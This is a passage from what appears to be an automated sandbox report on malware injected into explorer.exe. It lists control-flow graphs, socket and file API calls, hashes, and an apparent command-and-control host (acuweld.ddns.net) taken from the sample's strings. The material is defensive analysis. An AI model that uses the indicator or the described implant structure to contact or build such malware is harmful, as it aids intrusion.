shutdown closesocket CloseHandle 73->75 76 29e8353-29e836a call 29e3ff0 73->76 74->61 83 29e7fe9-29e7ff1 74->83 75->72 80 29e836f-29e8372 76->80 81 29e83b4-29e841a shutdown closesocket CloseHandle 80->81 82 29e8374-29e83b2 CloseHandle 80->82 84 29e8423 81->84 82->84 83->61 85 29e7ff7-29e804a call 29e6620 83->85 84->72 85->61 88 29e8050-29e8098 call 29e60d0 85->88 88->61 91 29e809e-29e80a6 88->91 91->61 92 29e80ac-29e80c3 WSACreateEvent 91->92 92->61 93 29e80c5-29e80e3 WSAEventSelect 92->93 94 29e811a-29e8133 CloseHandle 93->94 95 29e80e5-29e8110 93->95 94->61 95->94
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                          • String ID: 8$acuweld.ddns.net${09A61D51-FBD6-417E-8B8C-126727FBF1A9}
                                                          • API String ID: 3117981272-1396742101
                                                          • Opcode ID: 95c3a771c80c50d6fc9879fb3b9f9b85196d88a4227ae349c4e74b39fe25554d
                                                          • Instruction ID: 0bc51e8a9e926e3b04c4c5b70801c2e78123d2e47f3e203441e38644e39abd2d
                                                          • Opcode Fuzzy Hash: 95c3a771c80c50d6fc9879fb3b9f9b85196d88a4227ae349c4e74b39fe25554d
                                                          • Instruction Fuzzy Hash: 7E32E632219AC4C6EB72DB54E8883EAB365F7C9749F504215DACA43B68DF7DC944CB01
                                                          Function 029E54D0 Relevance: 61.8, APIs: 41, Instructions: 306networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 96 29e54d0-29e550b socket 97 29e550d-29e550f 96->97 98 29e5514-29e552b WSAGetLastError WSACreateEvent 96->98 99 29e5b29-29e5b30 97->99 100 29e552d 98->100 101 29e5537-29e554f WSAEventSelect 98->101 102 29e5b0c-29e5b27 shutdown closesocket 100->102 103 29e555b-29e5565 101->103 104 29e5551 101->104 102->99 106 29e577e-29e5793 103->106 107 29e556b-29e5575 103->107 105 29e5b01-29e5b06 CloseHandle 104->105 105->102 108 29e57a5-29e57c2 inet_addr 106->108 109 29e5795-29e57a3 106->109 110 29e5577-29e5582 107->110 111 29e5584-29e559b inet_addr 107->111 112 29e5809-29e5856 htons connect 108->112 113 29e57c4-29e57e3 gethostbyname 108->113 109->112 114 29e55d6-29e5614 htons connect 110->114 111->114 115 29e559d-29e55b6 gethostbyname 111->115 112->105 122 29e585c-29e5867 WSAGetLastError 112->122 120 29e57ff 113->120 121 29e57e5-29e57fd 113->121 118 29e561a-29e5625 WSAGetLastError 114->118 119 29e5779 114->119 116 29e55cc 115->116 117 29e55b8-29e55ca 115->117 116->105 117->114 118->119 123 29e562b-29e5646 118->123 119->105 120->105 121->112 122->105 124 29e586d-29e588e 122->124 125 29e565f-29e568a WSAWaitForMultipleEvents 123->125 126 29e5648-29e565b 123->126 127 29e58b0-29e58e7 WSAWaitForMultipleEvents 124->127 128 29e5890-29e58a9 124->128 129 29e568c-29e56a4 WSACloseEvent closesocket 125->129 130 29e56a9-29e56b1 125->130 126->125 131 29e58e9-29e58f4 127->131 132 29e5900-29e5918 WSACloseEvent closesocket 127->132 128->127 129->99 134 29e56b3-29e56cb WSACloseEvent closesocket 130->134 135 29e56d0-29e56d5 130->135 131->132 133 29e58f6-29e58fe 131->133 132->99 133->132 136 29e591d-29e5925 133->136 134->99 137 29e56d7-29e56ee WSAEnumNetworkEvents 135->137 138 29e5755-29e575a 135->138 136->105 140 29e592b-29e5945 WSAEnumNetworkEvents 136->140 141 29e570d-29e5716 137->141 142 29e56f0-29e5708 closesocket WSACloseEvent 137->142 138->119 139 29e575c-29e5774 closesocket WSACloseEvent 138->139 139->99 143 29e5947-29e595f WSACloseEvent closesocket 140->143 144 29e5964-29e596c 140->144 145 29e5718-29e5730 closesocket WSACloseEvent 141->145 146 29e5735-29e573e 141->146 142->99 143->99 148 29e596e-29e5986 WSACloseEvent closesocket 144->148 149 29e598b-29e5995 144->149 145->99 146->138 147 29e5740-29e5750 WSACloseEvent 146->147 147->99 148->99 150 29e5997-29e59b0 149->150 151 29e59b2-29e59cf inet_addr 149->151 152 29e59e9-29e59f1 150->152 153 29e59de 151->153 154 29e59d1-29e59dc 151->154 155 29e5a7a-29e5a82 152->155 156 29e59f7-29e5a5e call 29e5b40 152->156 153->152 154->152 155->105 157 29e5a84-29e5aed call 29e5cd0 155->157 161 29e5a75 156->161 162 29e5a60-29e5a70 CloseHandle 156->162 157->105 164 29e5aef-29e5aff CloseHandle 157->164 161->105 162->99 164->99
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorEventLastclosesocketshutdownsocket
                                                          • String ID:
                                                          • API String ID: 1739004367-0
                                                          • Opcode ID: 8da1c7132b83aca150742dcf2003de62bcd0b627448bcdc4e57245005c4dec9f
                                                          • Instruction ID: 6c3dd5d380cf6adb5f722c1d2351c04bcae3341f9d8a212513b7f5445361ba0a
                                                          • Opcode Fuzzy Hash: 8da1c7132b83aca150742dcf2003de62bcd0b627448bcdc4e57245005c4dec9f
                                                          • Instruction Fuzzy Hash: 04F1EB76219A80CBDB71CF15F84879AB7A0FB89794F411516EA8B87A68DF3CC944CF01
                                                          Function 029C8B50 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 240memoryfilestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 165 29c8b50-29c8b6a call 29c7d60 168 29c8b6c-29c8b6e 165->168 169 29c8b73-29c8b8f call 29d2ab0 165->169 170 29c90ae-29c90b5 168->170 173 29c90ac 169->173 174 29c8b95-29c8bc0 call 29c7e40 169->174 173->170 177 29c8bc6-29c8be1 LocalAlloc 174->177 178 29c90a1-29c90a6 LocalFree 174->178 179 29c907b-29c9081 177->179 180 29c8be7-29c8c54 lstrcpyW StrStrIW CreateFileW 177->180 178->173 181 29c908e-29c9094 179->181 182 29c9083-29c9088 LocalFree 179->182 183 29c8c5a-29c8c70 GetFileSize 180->183 184 29c9070-29c907a call 2d887f4 180->184 181->178 186 29c9096-29c909b LocalFree 181->186 182->181 187 29c905d-29c9063 183->187 188 29c8c76-29c8c92 LocalAlloc 183->188 184->179 186->178 187->184 189 29c9065-29c906a CloseHandle 187->189 188->187 191 29c8c98-29c8cc9 ReadFile 188->191 189->184 192 29c8ccf-29c8d34 CloseHandle 191->192 193 29c9052-29c9057 LocalFree 191->193 194 29c8d46-29c8d54 192->194 193->187 195 29c8d56-29c8d9e call 29de8a0 194->195 196 29c8da0-29c8dbb call 29e2660 194->196 195->194 196->193 202 29c8dc1-29c8de3 call 29c9140 196->202 205 29c8ffd-29c9006 202->205 206 29c8de9-29c8e0a LocalAlloc 202->206 205->193 208 29c9008-29c9026 call 29c90c0 205->208 206->205 207 29c8e10-29c8e31 LocalAlloc 206->207 209 29c8fef-29c8ff7 LocalFree 207->209 210 29c8e37-29c8f01 call 29ea620 lstrcpyW * 3 207->210 208->193 215 29c9028-29c904c VirtualFree 208->215 209->205 218 29c8f07-29c8f12 210->218 219 29c8fe1-29c8fe9 LocalFree 210->219 215->193 220 29c8f24-29c8f2c 218->220 219->209 220->219 221 29c8f32-29c8f52 220->221 222 29c8fdc 221->222 223 29c8f58-29c8f83 221->223 222->220 224 29c8f85-29c8f9b 223->224 225 29c8fa3-29c8fd7 LocalFree * 4 223->225 224->225 225->170
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                          • String ID: .DLL
                                                          • API String ID: 2968648924-899428287
                                                          • Opcode ID: abbc0750c445ad305f6bb06c6c7bcb2d2b9da8874d249a1ec83b96a57ca1d5ea
                                                          • Instruction ID: 70c3ea10671a0c34fd48863c4fdfc5d23bb7a1f8a3b7101a95d9b01a7a270a2a
                                                          • Opcode Fuzzy Hash: abbc0750c445ad305f6bb06c6c7bcb2d2b9da8874d249a1ec83b96a57ca1d5ea
                                                          • Instruction Fuzzy Hash: C7D10D36208B80C6E760DB15F89876AB3A5F7C5794F104229EA9E87BA8DF3CC445CF41
                                                          Function 029CCB30 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 77memoryfilesynchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 227 29ccb30-29ccb35 228 29ccb39-29ccb50 WaitForSingleObject 227->228 229 29ccb56-29ccb6f SHGetKnownFolderPath 228->229 230 29cccb2-29cccb8 228->230 231 29cccad 229->231 232 29ccb75-29ccb90 LocalAlloc 229->232 231->228 233 29ccb96-29ccc03 call 29e9e0c CreateFileW 232->233 234 29ccca2-29ccca7 CoTaskMemFree 232->234 237 29ccc84-29ccc8a 233->237 238 29ccc05-29ccc0c 233->238 234->231 239 29ccc8c-29ccc91 CloseHandle 237->239 240 29ccc97-29ccc9c LocalFree 237->240 241 29ccc0e-29ccc15 238->241 242 29ccc21-29ccc6a CloseHandle LocalFree CoTaskMemFree OpenEventW 238->242 239->240 240->234 241->237 245 29ccc17 call 29d5700 241->245 243 29ccc6c-29ccc7c SetEvent CloseHandle 242->243 244 29ccc82 242->244 243->244 244->230 247 29ccc1c-29ccc1f 245->247 247->237 247->242
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait
                                                          • String ID: %s\%s${79881EDC-8392-45EB-98FC-8D3F2C8F02B1}
                                                          • API String ID: 2734627627-1695140496
                                                          • Opcode ID: 61a440de229982222c4e445fa0fa761b8304d83b3696ebd8c22692339c841ccc
                                                          • Instruction ID: 4f16feaad494a0cd1853a1a367e7b942a704a508baa1a53e3daa0ddd381afe75
                                                          • Opcode Fuzzy Hash: 61a440de229982222c4e445fa0fa761b8304d83b3696ebd8c22692339c841ccc
                                                          • Instruction Fuzzy Hash: BA41CA31204A8083E720DB65F85835AA775F7C67B5F600726E6AE42AF4DF7DC586CB02
                                                          Function 029E60D0 Relevance: 16.7, APIs: 11, Instructions: 234timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 248 29e60d0-29e60f2 249 29e6119-29e6121 248->249 250 29e60f4-29e6114 call 29e4d00 248->250 252 29e612a-29e617a call 29e38f0 WSACreateEvent 249->252 253 29e6123-29e6125 249->253 254 29e6607-29e660e 250->254 258 29e617c 252->258 259 29e6186-29e61b7 call 29e38f0 252->259 253->254 260 29e65ec-29e65fa 258->260 265 29e61c9-29e61d7 259->265 263 29e65fc-29e6603 260->263 264 29e6605 260->264 263->254 264->254 266 29e61d9-29e61fe 265->266 267 29e6200-29e6208 265->267 266->265 269 29e620e-29e6224 267->269 270 29e65d9-29e65df 267->270 271 29e6236-29e6244 269->271 270->260 272 29e65e1-29e65e6 CloseHandle 270->272 273 29e629d-29e62a5 271->273 274 29e6246-29e6267 WaitForSingleObject 271->274 272->260 275 29e62a7 273->275 276 29e62b1-29e62e3 call 29e4d00 273->276 277 29e629b 274->277 278 29e6269-29e6294 274->278 275->270 282 29e62f5-29e6303 276->282 277->271 278->277 283 29e635c-29e6364 282->283 284 29e6305-29e6326 WaitForSingleObject 282->284 287 29e6366 283->287 288 29e6370-29e6378 283->288 285 29e635a 284->285 286 29e6328-29e6353 284->286 285->282 286->285 287->270 290 29e637a 288->290 291 29e6384-29e638c 288->291 290->270 292 29e63fe-29e6406 291->292 293 29e638e-29e63f9 291->293 294 29e640c-29e6417 WSAGetLastError 292->294 295 29e65d2 292->295 293->267 294->295 296 29e641d-29e6438 WSAEventSelect 294->296 295->270 297 29e643a-29e6449 296->297 298 29e6453-29e6487 WSAWaitForMultipleEvents 296->298 297->270 299 29e6489-29e6498 298->299 300 29e64a2-29e64aa 298->300 299->270 301 29e64ac-29e64bb 300->301 302 29e64c5-29e64cd 300->302 301->270 303 29e6556-29e6573 WSAEnumNetworkEvents 302->303 304 29e64d3-29e64de 302->304 305 29e6588-29e6590 303->305 306 29e6575-29e6584 303->306 307 29e64f0-29e64fe 304->307 308 29e6592-29e659e 305->308 309 29e65a0-29e65a8 305->309 306->270 310 29e654c 307->310 311 29e6500-29e6521 WaitForSingleObject 307->311 308->309 312 29e65af-29e65bb 308->312 309->312 313 29e65aa 309->313 310->270 314 29e654a 311->314 315 29e6523-29e6543 311->315 317 29e65bd-29e65cc 312->317 318 29e65d0-29e65d4 312->318 313->267 314->307 315->314 317->270 318->267
                                                          APIs
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 029E610F
                                                            • Part of subcall function 029E4D00: recv.WS2_32 ref: 029E4D2C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Timer$ChangeConcurrency::details::platform::__Queuerecv
                                                          • String ID:
                                                          • API String ID: 2709879575-0
                                                          • Opcode ID: 9932c48d30a493af779b53788e8de090b8f3c95410308306be4635da276b65b1
                                                          • Instruction ID: 8b0dfd5e3307dd3d5db185bd9559b9c553db44c0db13d4972900a045b90fd47f
                                                          • Opcode Fuzzy Hash: 9932c48d30a493af779b53788e8de090b8f3c95410308306be4635da276b65b1
                                                          • Instruction Fuzzy Hash: 9BC1D3726187C0CADB72CB19E4847AAB7A9F7D9744F00451ADB8A87B58DF79C484CF02
                                                          Function 029D2830 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • SHGetKnownFolderPath.SHELL32 ref: 029D28A7
                                                          • LocalAlloc.KERNEL32 ref: 029D28FC
                                                          • CoTaskMemFree.COMBASE ref: 029D2967
                                                            • Part of subcall function 029E9E0C: _errno.LIBCMT ref: 029E9E43
                                                            • Part of subcall function 029E9E0C: _invalid_parameter_noinfo.LIBCMT ref: 029E9E4E
                                                          • CoTaskMemFree.COMBASE ref: 029D2955
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeTask$AllocFolderKnownLocalPath_errno_invalid_parameter_noinfo
                                                          • String ID: %s\%s\
                                                          • API String ID: 1287779424-2168696002
                                                          • Opcode ID: f0efbd3a63665eed9ad0557dea58e580402d2a73d26fac649e8f4963ffa7e1bf
                                                          • Instruction ID: 84a881324e2f20536b06e31bf939dd7a46db30c2436a9c1e3f980e0e42f7d4bb
                                                          • Opcode Fuzzy Hash: f0efbd3a63665eed9ad0557dea58e580402d2a73d26fac649e8f4963ffa7e1bf
                                                          • Instruction Fuzzy Hash: 5A311A32708A8486DB50DB65E86439AB7A5F7C9BD0F904025EB8E83B68DF7CC945CB00
                                                          Function 02D01B95 Relevance: 3.1, APIs: 2, Instructions: 124timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 336 2d01b95-2d01b9d 337 2d01ba3 336->337 338 2d01ba9 336->338 337->338 339 2d01bab 338->339 340 2d01bad-2d01bb3 339->340 341 2d01bdf-2d01be9 339->341 344 2d01c59-2d01c5c 340->344 345 2d01bb9-2d01bd8 call 2d01be4 340->345 342 2d01c2a-2d01c34 341->342 343 2d01bef 341->343 348 2d01c3a-2d01c53 342->348 346 2d01bf5 343->346 347 2d01bfb-2d01c02 343->347 349 2d01c62 344->349 350 2d01c68-2d01c6b 344->350 345->339 361 2d01bda-2d01bdc 345->361 346->347 352 2d01c11-2d01c1b 347->352 353 2d01c08-2d01c0b 347->353 348->344 349->350 354 2d01c71-2d01c93 350->354 355 2d01cf3-2d01fa8 350->355 358 2d01c21 352->358 353->358 359 2d01c99-2d01c9d 354->359 360 2d01c9e-2d01cba timeGetTime 354->360 364 2d01fae-2d01fba 355->364 365 2d01fbf-2d02020 SleepEx call 2d0202b 355->365 358->348 359->360 362 2d01cc0-2d01ccb call 2d01cd7 360->362 363 2d01cde-2d01cee 360->363 361->341 370 2d01cd7-2d01cdd 362->370 371 2d01ccd-2d01cee 362->371 363->355 364->365 369 2d02025-2d0202a 365->369 370->363 371->355
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SleepTimetime
                                                          • String ID:
                                                          • API String ID: 346578373-0
                                                          • Opcode ID: 88d5320bdb042a78126fada8aec86a8ebcf617c37fc870824970ed6e20339edb
                                                          • Instruction ID: 74b3c6d586e79f98b63abdc9c638b3325f630fc24c127cf6f9824358269e1c0f
                                                          • Opcode Fuzzy Hash: 88d5320bdb042a78126fada8aec86a8ebcf617c37fc870824970ed6e20339edb
                                                          • Instruction Fuzzy Hash: B841D173F0C240CFD7008E76C9843E833A2E709768B4A4829CB5857BA9E7348C62DB44
                                                          Function 02D01BE4 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 372 2d01be4-2d01be9 373 2d01c2a-2d01c34 372->373 374 2d01bef 372->374 377 2d01c3a-2d01c5c 373->377 375 2d01bf5 374->375 376 2d01bfb-2d01c02 374->376 375->376 378 2d01c11-2d01c1b 376->378 379 2d01c08-2d01c0b 376->379 382 2d01c62 377->382 383 2d01c68-2d01c6b 377->383 381 2d01c21 378->381 379->381 381->377 382->383 384 2d01c71-2d01c93 383->384 385 2d01cf3-2d01fa8 383->385 387 2d01c99-2d01c9d 384->387 388 2d01c9e-2d01cba timeGetTime 384->388 391 2d01fae-2d01fba 385->391 392 2d01fbf-2d02020 SleepEx call 2d0202b 385->392 387->388 389 2d01cc0-2d01ccb call 2d01cd7 388->389 390 2d01cde-2d01cee 388->390 397 2d01cd7-2d01cdd 389->397 398 2d01ccd-2d01cee 389->398 390->385 391->392 396 2d02025-2d0202a 392->396 397->390 398->385
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
